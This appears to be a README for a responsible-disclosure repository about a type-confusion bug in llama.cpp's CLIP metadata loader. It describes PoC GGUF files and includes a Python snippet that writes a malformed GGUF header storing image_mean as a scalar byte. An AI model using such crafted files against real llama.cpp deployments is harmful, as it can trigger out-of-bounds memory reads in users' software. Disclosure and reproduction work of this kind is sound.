
GGUF clip memory corruption PoC

This repository contains proof-of-concept GGUF files demonstrating a metadata type-confusion issue in llama.cpp's clip.cpp loader.

Included files:

  • gguf-clip-short-both-u8.gguf
  • gguf-clip-scalar-mean-u8.gguf
  • gen_clip_oob_poc.py

Summary:

  • clip.vision.image_mean and clip.vision.image_std are consumed as float[3]
  • the loader reads these keys without verifying that the value is an array, that its element type is float32, or that it holds at least three elements
  • malformed GGUF metadata can therefore be interpreted with the wrong type during model load
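The size mismatch above can be made concrete: a float[3] read expects 12 bytes of value data, while an arr[u8,1] payload supplies only 1, so an unchecked copy reads past the end of the value. A minimal illustration (not the llama.cpp code itself):

```python
import struct

# Bytes a well-formed arr[f32,3] value occupies for image_mean/image_std.
expected = struct.calcsize("<3f")   # 12 bytes
# Bytes actually present in the malformed arr[u8,1] payload.
supplied = struct.calcsize("<1B")   # 1 byte

overread = expected - supplied
print(f"unchecked float[3] read overruns the value by {overread} bytes")
```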

Relevant code paths in llama.cpp:

  • tools/mtmd/clip.cpp
  • ggml/src/gguf.cpp

PoC notes:

  • gguf-clip-short-both-u8.gguf stores image_mean and image_std as arr[u8,1]
  • gguf-clip-scalar-mean-u8.gguf stores image_mean as scalar u8
  • both files are valid enough to reach the vulnerable metadata-consumption path during load
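The core trick that gen_clip_oob_poc.py automates can be sketched directly with Python's struct module, assuming the GGUF v3 layout (magic "GGUF", u32 version, u64 tensor count, u64 KV count, then length-prefixed keys each followed by a u32 value-type tag). This writes only the malformed image_mean entry; a real PoC also needs the other metadata clip.cpp expects before it reaches that key:

```python
import struct

def write_kv_scalar_u8(buf, key, value):
    """Append a GGUF KV pair whose value is a scalar uint8 (type id 0)."""
    kb = key.encode()
    buf += struct.pack("<Q", len(kb)) + kb  # key: u64 length + raw bytes
    buf += struct.pack("<I", 0)             # value type tag: GGUF_TYPE_UINT8
    buf += struct.pack("<B", value)         # the single-byte payload

# Minimal GGUF v3 header: magic, version, tensor count, KV count.
buf = bytearray()
buf += b"GGUF"
buf += struct.pack("<IQQ", 3, 0, 1)         # version 3, 0 tensors, 1 KV

# Store image_mean as a scalar u8 instead of the expected arr[f32,3].
write_kv_scalar_u8(buf, "clip.vision.image_mean", 0x41)

with open("gguf-clip-scalar-mean-u8.gguf", "wb") as f:
    f.write(buf)
```

A loader that trusts the key name and reads a float[3] from this value will interpret the 1-byte payload (and whatever follows it) with the wrong type.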

This repo is intended for responsible vulnerability reporting and reproduction.
